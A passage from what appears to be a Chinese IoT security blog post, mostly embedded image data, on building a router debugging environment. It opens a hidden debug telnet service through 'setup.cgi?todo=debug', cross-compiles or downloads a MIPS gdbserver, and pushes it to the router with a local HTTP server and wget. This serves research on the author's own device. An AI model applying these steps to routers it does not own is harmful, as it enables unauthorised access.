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
|
|||
|
|
<p blockindex=34>所以可以通过<code>todo=debug</code>开启telnet</p>
|
|||
|
|
<p blockindex=35><img src=data:image/png;base64,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
|
|||
|
|
<pre blockindex=36><code class="hljs language-bash">192.168.1.1/setup.cgi?todo=debug
|
|||
|
|
telnet 192.168.1.1
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=37><img src=data:image/png;base64,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
|
|||
|
|
<h4 blockindex=38>编译gdbserver</h4>
|
|||
|
|
<p blockindex=39>在路由器上也要进行相应的调试配置</p>
|
|||
|
|
<p blockindex=40>注意路由器是小端序,参数加上-EL</p>
|
|||
|
|
<p blockindex=41><a href=https://blog.csdn.net/qq_38204481/article/details/105391866>搭建iot动态调试环境_九层台-CSDN博客</a></p>
|
|||
|
|
<pre blockindex=42><code class="hljs language-sh">sudo apt-get install linux-libc-dev-mipsel-cross
|
|||
|
|
sudo apt-get install libc6-mipsel-cross libc6-dev-mipsel-cross
|
|||
|
|
sudo apt-get install binutils-mipsel-linux-gnu gcc-mipsel-linux-gnu
|
|||
|
|
sudo apt-get install g++-mipsel-linux-gnu
|
|||
|
|
</code></pre>
|
|||
|
|
<pre blockindex=43><code class="hljs language-sh">wget https://ftp.gnu.org/gnu/gdb/gdb-10.1.tar.xz
|
|||
|
|
tar xvf gdb-10.1.tar.xz
|
|||
|
|
<span class=hljs-built_in>cd</span> gdb-10.1
|
|||
|
|
CC=<span class=hljs-string>"mips-linux-gnu-gcc -EL"</span> CXX=<span class=hljs-string>"mips-linux-gnu-g++"</span> ./configure --target=mips-linux-gnu --host=<span class=hljs-string>"mips-linux-gnu"</span> --prefix=<span class=hljs-string>"/root/tgdb"</span> LDFLAGS=<span class=hljs-string>"-static"</span>
|
|||
|
|
make -j7
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=44>编译不了,不知道为啥(</p>
|
|||
|
|
<p blockindex=45>这里下一个</p>
|
|||
|
|
<p blockindex=46><a href=https://github.com/stayliv3/gdb-static-cross/tree/master/prebuilt>https://github.com/stayliv3/gdb-static-cross/tree/master/prebuilt</a></p>
|
|||
|
|
<p blockindex=47><a href=https://gitee.com/h4lo1/HatLab_Tools_Library/tree/master/%E9%9D%99%E6%80%81%E7%BC%96%E8%AF%91%E8%B0%83%E8%AF%95%E7%A8%8B%E5%BA%8F/gdbserver>HatLab Tools Library: 海特实验室IoT安全工具/环境整合 - Gitee.com</a></p>
|
|||
|
|
<h4 blockindex=48>上传gdbserver</h4>
|
|||
|
|
<p blockindex=49>比较好的办法是使用http server</p>
|
|||
|
|
<pre blockindex=50><code class="hljs language-php">python -m http.server <span class=hljs-number>9999</span>
|
|||
|
|
wget http:<span class=hljs-comment>//192.168.1.2:9999/gdbserver</span>
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=51><img src="data:image/png;base64,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